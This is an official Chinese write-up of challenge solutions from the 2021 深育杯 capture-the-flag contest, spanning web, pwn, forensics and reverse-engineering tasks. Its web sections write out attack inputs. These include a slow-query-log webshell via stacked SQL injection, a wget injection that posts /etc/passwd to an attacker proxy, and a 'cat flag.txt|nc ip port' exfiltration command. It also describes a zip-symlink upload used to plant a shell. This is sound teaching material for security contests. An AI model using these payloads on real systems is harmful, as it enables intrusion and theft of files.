2021深育杯线上初赛官方 WriteUp

作者：深信服千里目安全实验室 原文链接：https://mp.weixin.qq.com/s/Iwj_zNgYZKZvJOYuhmlz3w

访问robots.txt，可得三个文件index.php、config.php、helpyou2findflag.php。

fuzz黑名单，可发现select、单双引号、括号、分号、set、show、variables、等都没有过滤。

经测试可得到闭合方式为括号，且白名单为数据库记录行数，使用1);{sqlinject}-- +可以闭合查询语句并进行堆叠注入。

查询慢日志记录有关的变量。

修改慢查询日志的保存位置。

sleep函数再黑名单中因此不能直接使用，这里有一个考点：慢查询日志只会记录超过long_query_time时间的查询语句，因此要在写入webshell的sql语句中超过执行耗时命令，由于union和sleep都被过滤所以需要一定的绕过技巧，最简单的方式应该是修改long_query_time的值。

查询慢查询日志的判定时间。

查询一个webshell，查询记录就会被添加到slow_query_log_file变量所指向的位置，这里fuzz黑名单可知一句话木马中常见的关键词被过滤了，绕过一下即可：1);select '';--+ 访问helpyou2findflag.php即可访问webshell。

接下来就是找flag了，查看用户发现有rainbow用户，ip:port/helpyou2findflag.php?a=system&b=awk%20-F%27:%27%20%27{%20print%20$1}%27%20/etc/passwd,查看家目录发现有ssh.log,flag就在其中。

题目只有三个路由，一个输入点，容易判断考点是命令注入，因此需要先不断测试传入数据并刷新观察回显，来猜测后端与wget命令拼接逻辑和过滤逻辑，下面是三个比较典型的fuzz示例。 www.baidu.com

teststr with space www.badiu.com 这里fuzz出空格不可用

ls;\nwww.baidu.com 这里fuzz出分号不可用，同理可得反引号，|,;,&均被过滤，同时能够测试出可利用\n绕过正则检查，只需要构造出空格且领用wget命令即可

第一步测试出可利用\n绕过合法性检查，且特殊符号被替换成空格，至此已经能够构造出POC读文件了，利用http_proxy和--body-file参数读取本地文件发送到代理服务器上： -e;http_proxy=http://ip:port/;--method=POST;--body-file=/etc/passwd;\nwww.baidu.com 这里特殊符号被替换成空格，\n绕过了检查wget的grep命令，并将/etc/passwd的文件内容发送到代理机上：

接下来就是找flag文件，第三个路由（点击getflag）访问后看网站源码，可知flag文件名称是flag_is_here

建议的思路是：/etc/passwd看到有ctf_user用户，读取ctf_user用户的.bash_history得到flask程序的根目录是/home/ctf_user/basedirforwebapp/，直接读文件/home/ctf_user/basedirforwebapp/flag_is_here即可得到flag。

访问首页“/”时，发现cookie为node=dGhlcmUgaXMgbm90aGluZ34h，base64解码后结果为“there is nothing~!”。

访问接口“/register”时，尝试进行注入，会提示“SQL Injection Attack Found! IP record!”。 正常访问接口“/register”时，返回结果为“IP have recorded!”，同时，发现设置了Cookie为node=bWF4X2FsbG93ZWRfcGFja2V0，base64解码后结果“max_allowed_packet”。

访问“/hint”时，发现cookie为node=fiBub2RlLXBvc3RncmVzIH4h，base64解码后结果为“~ node-postgres ~!”。

进一步进行注入探测，可以知道，过滤了以下字符串：   "select",   "union",   "and",   "or",   "\\",   "/",   "*",   " " 结合以上两点信息，可以知道此web服务使用nodejs，并且waf数据保存在mysql中，而注册数据保存在postgresql中，同时可以利用mysql的max_allowed_packet特性绕过waf，并结合nodejs postgres包的RCE漏洞进行利用，给出如下exp.py。

执行“python3 exp.py http://ip:端口/register "cat flag.txt|nc ip 端口"”，如下。 远程服务器监听9999端口，获得flag。

访问网站自动下载了一个log文件。 打开查看内容，提示logname错误，那么可能需要提交logname。

并且抓包可以发现filename的路径为logs/info/info.2021-08-22.log

提交参数仍然返回错误，但可以看到改文件名其实是一个日志文件名，那么他应该是按日分割的，代入今天的年月日。

发现成功读取到日志文件（这里无法做目录遍历），根据日志内容可判断，该web是springboot，对应的jar包名为cb-0.0.1-SNAPSHOT.jar，尝试是否可以下载jar包。

成功下载jar包。

反编译jar包，可以看到刚才访问请求方法为index。 并且发现还存在一个/bZdWASYu4nN3obRiLpqKCeS8erTZrdxx/parseUser接口，对提交的user参数做base64解码，并进行反序列化，那么该处存在一个反序列化漏洞。

分析pom.xml文件，发现有commons-beanutils:1.8.2依赖，

但ysoserial工具里的CommonsBeanutils链，除了依赖commons-beanutils以外，还依赖commons-collections，导致无法使用。

这里需要找到一条无依赖CC包的利用链，如下图所示

上述的clazzBytes需替换成springboot回显class，代码如下：

两者结合生成序列化数据，提交到服务端,数据包如下：

拿到回显了。

tmp目录下找到flag文件。

获取到flag。

当解压操作可以覆盖上一次解压文件就可以造成任意文件上传漏洞。 查看upload.php源码。

zip.php

构造payload： 先构造一个指向 /var/www/html的软连接(因为html目录下是web环境，为了后续可以getshell)。

利用命令(zip --symlinks test.zip ./*)对test文件进行压缩：

此时 上传该test.zip 解压出里边的文件也是软连接 /var/www/html目录下 接下来的思路 就是想办法构造一个gethsell文件 让gethsell文件正好解压在/var/www/html 此时就可以getshell。 构造第二个压缩包，我们先创建一个test目录(因为上一个压缩包里边目录就是test)，在test目录下写一个shell文件，在压缩创建的test目录 此时压缩包目录架构是：test/cmd.php 。 当我们上传这个压缩包时 会覆盖上一个test目录 但是 test目录软链接指向/var/www/html 解压的时候会把cmd.php 放在/var/www/html 此时我们达到了getsehll的目的 。

上传第一个压缩包：

在上传第二个压缩包文件，此时cmd.php 已经在/var/ww/html 目录下 访问 。

访问cmd.php 执行命令，成功读取到flag。

分析find_flag程序，存在的漏洞位于sub_132F函数中，该函数中，存在栈溢出漏洞，如下所示：

利用代码如下所示：

反编译create_code，漏洞点见如下代码注释处：

通过上述分析，可以知道，申请了1000字节RWX内存，当前四字节内容为0xF012F012时，会为进一步判断后续内存数据，数据内容限定在0~0xF之间，后续直接执行此处代码。因而，这里可以使用如下指令进行构造，exp如下：

本题将 array.shift 进行了 patch ，每一次 shift 会将 length 减 2 ，那么当 length 为 1 的时候进行一次 shift 便可以得到一个 oob array ，之后便是常规的思路： leak elf_base -> leak libc_base -> leak stack_base -> write ret_addr to one_gadget 编辑exp.js

写文件 问题： 测试时写文件，发现文件存在，则上传的文件为.bak结尾。

但是代码中给了一段copy覆盖的代码，用来解决这个问题。 参考skay小姐姐的base64编码的方法： http://noahblog.360.cn/blackhat-2021yi-ti-xiang-xi-fen-xi-fastjsonfan-xu-lie-hua-lou-dong-ji-zai-qu-kuai-lian-ying-yong-zhong-de-shen-tou-li-yong-2/ 接下来就是将修改后的so文件上传并替换了，文件名为通过第一步获取到的文件名。 上传后，再次访问/test接口，触发rce。

OK，读取之到此结束。

打开页面需要登录，无账号密码，唯一可疑的只有底下的获取实例，点击发现可以获取一个提示文档，并说按照文档向[email protected]发送邮件即可获取账号。

提示文档是个zip压缩包，里面还有一个加密的压缩包，看到三个文件都被加密了，第一反应解zip伪加密。

winhex修改所有0900伪0000后，发现文件的加密符都没了但是只有示例 - 副本可以正常打开。

由于副本和原文件的原始大小一样，所以盲猜是明文攻击，这里使用winrar压缩后，校对CRC一致，满足明文攻击要求，使用ARCHPR 4.54即可

1min左右就可以跑出密码为qwe@123，解压出password.zip，打开看见还是加密的，想要获得管理员账号密码，但仍有加密，且不是伪加密，又看到三个txt的原始大小只有6字节，这就是典型的CRC32碰撞，github上搜crc32直接碰

得到密码welc0me_sangforctf，解压得到.password.swp，linux下执行vim -r .password.swp 即可恢复出原文件。

回网站登录，看到恭喜我得到了flag，猜测藏在了页面源码里了。

但是所有查看源码的快捷键都被禁止了，都会弹框What are U f**king doing!，这里解法也不唯一，可以利用浏览器插件，也可以利用burpsuite，这我仅用bp举例。

（本题有两个故事线，实际步骤可能与此wp有所不同） 第一步：使用binwalk分析出有zlib数据，但是无法使用binwalk -e或foremost分离出有效文件，在010editor中查看图片。

第二步：010 editor中看到最后一个IDAT数据块长度异常，导出这段zlib数据。

第三步：观察IDAT标识后面的87 9C两个字节，恢复成zlib数据头标识78 9C，写脚本将此段zlib数据解压缩，可得到一个rar压缩包。注意解压缩的zlib数据应该是去掉IDAT-length、IDAT-type、IDAT-crc的数据部分，即（78 9C ..... ）。

解压压缩包可得flag2，注意压缩包中有提示请先获取flag1。 第四步：继续找flag1，分析最开始的那张图片，实际使用zsteg和exiftool可以发现其他可以信息。 exiftool看到Copyright有可以十六进制：翻译过来是：dynamical-geometry。

zsteg发现这张图片除了存在extradata外，在中也有脏数据。

使用StegSolve检查隐写。

第五步：导出十六进制，这里不能直接打开图片，可使用foremost将PNG快速分离出来,最后得到一张590x590，大小为979KB的图片，注意如果仅去掉PNG字符前数据并改后缀为PNG也能正常查看图片，但会阻塞下一步分析像素操作。 第六步：到这里只有一张色彩值杂乱的PNG图片，分析其像素。

第七步：取前四个字节即可看出，像素第三列隐藏着压缩包十六进制，批量提取并保存成zip压缩包，使用第四步得到的密码：dynamical-geometry解密，得到flag1文件。

第八步：记事本打开文件后，是3D打印模型中的STL格式文件，STL格式分为ascii、binary格式，使用在线工具或开源工具查看模型即可。这一步并不需要脑洞，拷贝stl-ascii格式数据百度即可查询到STL文件格式的有关内容。

根据flag1的STL格式，将flag2也尝试用STL预览器查看：

看文件名zse456tfdyhnjimko0-=[;.,.vera可以发现是用Veracrpyt加密后的文件，观察文件名发现是初级磁盘密码，根据字母按键盘能得到密码：pvd。

使用任意一个没有被使用的卷标识挂载文件，能够得到如下两个文件。

看文件头37 7A BC AF可只是7z压缩包，直接解压即可（是为了尽量减少附件体积，因为bitlocker加密对分区有大小限制所以初始分区较大），得到附件gooood。 拖入010editor，发现有如下字样，能够看出是windows下的分区，或者是放到linux下使用file命令进行识别。

修改后缀为vhd，双击gooood.vhd文件发现被bitlocker加密，使用bitlocker2john结合hashcat爆一下弱密码字典，bitlocker2john -i gooood.vhd,然后将User Password hash的值保存成hash.txt，将弱密码的字典放到passwd.txt，使用hashcat -m 22100 hash.txt passwd.txt --show爆出密码:abcd1234。

用abcd1234解密bitlocker加密的分区，打开之后是空的，使用diskgenius挂载分区，可以在隐藏分区的回收站里找到提示和附件。

打开文本文档发现hint是3389,即提示黑客使用远程桌面连接到了受害者主机看到了flag，这里有个知识点是关于：rdp协议默认开启位图缓存功能，会产生bmc文件，使用bmc-tool或者BMC Viewer能够恢复出缓存的图像。

清晰可见: cmRwY2FjaGUtYm1j,解密baset64即为flag:SangFor{rdpcache-bmc}。

1.首先要在众多流量中甄别出DNS流量中隐藏有关键信息，普通流量中DNS流量不会有这么多，其次也可以通过全局搜索secret关键字找到提示becareful_rainbow,根据rainbow关键词可以发现，DNS流量中请求了非常多域名后缀为rainbow.bubble的流量。

通过过滤:tcp and frame contains "secret"可以找到TRUESECRET。

2.这一步可以使用脚本提取，也可以使用tshark命令提取全部的dns.qry.name，tshark -Y misc3.pcap -T fields -e dns.qry.name -r 'udp.dstport==53' > domain.txt可将DNS中所有解析的域名存放于domain.txt中，删除所有的43.9.227.10.in-addr.arpa即可得到纯净的域名请求记录。

3.脚本提取二级域名前缀，组成十六进制保存成PNG图片可以得到一张二维码（datamatrix格式）。

print("".join([j.split(".")[1] for j in [i.strip() for i in open(r"domain.txt",'r').readlines() if i is not "\n"]]))

然后将十六进制放到010editor中保存为PNG，然后解码：

4.观察的到的秘钥ecb_pkcs7可知是AES加密，用这个秘钥去解密搜索关键词secret得到的密文（密文有五段，组合起来urldecode即可解密），得到sslkey.log，需要选定模式为：ECB-pkcs7-256

第一段密文

AES解密

5.得到日志后导入wireshark解密https的流量

IDA打开分析主函数，如图：

程序先读取一个名为flag的文件，进行一系列计算后输出附件所示的out程序，容易分析出核心算法即为sub_40094B，分析此函数。

利用case中的字符，能够从公开网络中大致查出这类似于brainfuck语言，但有所扩展使得我们不能直接利用开源工具计算结果。

strcpy中的字符串即为类brainfuck的操作码，从上面的函数看，这段代码的含义大致为：读取一个字符，用160减去此字符，所得的结果再乘5，加2，输出到结果中。 利用out逐字节反算，可以得到一组base64值。

解base64即为flag。

1.首先运行程序尝试输入，根据运行结果可以猜测存在一个值与输入的(经过运算后)flag进行比对。

2.程序的主函数并不复杂，在IDA里面查看一下反编译后的C代码。

可以看出比较关键的内容是sub_402970、sub_402900和sub_4028A0函数，以及v3、v9、v10和v7参数，再直接查看反汇编代码可以看出v7为用户输入的flag。

3.查看一下sub_4028A0函数，我们知道dword_xxxxxx表示地址为xxxxxx的32位数据，这里被当作函数来使用。

使用交叉引用查看一下，其在sub_401010函数中被赋值，该值由sub_4055A0函数通过红框中的两个参数计算而得。

再对dword_433C58使用交叉引用，对经验的应该可以看出这段代码是获取kernel32.dll的基址。

那么，知道API HASH技术的应该可以猜测到sub_4055A0函数主要用于根据模块基址和HASH寻找对应的API函数。 4.sub_402900

5.sub_402970

可以看出类似的情况分别出现在了sub_402900和sub_402970函数中，所有使用到的API函数都被隐藏了，这种情况下，我们可以采用动态调试。 在动态调试前，我们先明确这里存在一个值用于验证其输入的flag是否正确，通过上述内容可以看出这个值应该是输入的flag经过计算后的结果，我们的首要目标应该是寻得该值，并根据该值逆推flag。 6.sub_4028A0动态分析

可以看出在sub_4028A0函数中主要是用到的是MultiByteToWideChar函数，调试并根据参数还原该段代码，应该为：

7.sub_402900动态分析

可以看出在sub_402900函数中主要用到的是WideCharToMultiByte函数，调试并根据参数还原该段代码，应该为：

8.根据上述内容，我们可以知道程序会把输入的flag进行utf-8编码，并传入sub_402970函数验证。

sub_402970函数中主要使用到的API为GetModuleHandleA、lstrcpyA和lstrcmpA，该函数会从.rsrc节中获取用于验证flag正确性的值，即“E4 B8 8D E5 81 9A E4 BC 9F E5 A4 A7 E6 97 B6 E4 BB A3 E7 9A 84 E6 97 81 E8 A7 82 E8 80 85 0”。 到这一步，我们其实比较明确，该程序只是将输入进行utf-8编码，并与隐藏在.rsrc节中的key进行对比验证，根据该key我们写出writeup。

得到flag。

验证。

IDA打开，发现目标程序进行了混淆，进一步分析，可以知道使用了ollvm进行了混淆。

使用工具中的deflat.py脚本，去除混淆的代码。 python deflat.py shift_exercise 0x401170 去除之后，生成shift_exercise_recovered文件，IDA继续分析，仍然存在无用的控制流程。

进一步使用IDA插件script.py进行处理，获得更为直观的伪代码。

分析伪代码可以知道，该算法为修改过的crc64算法，依据加密算法，写出解密算法。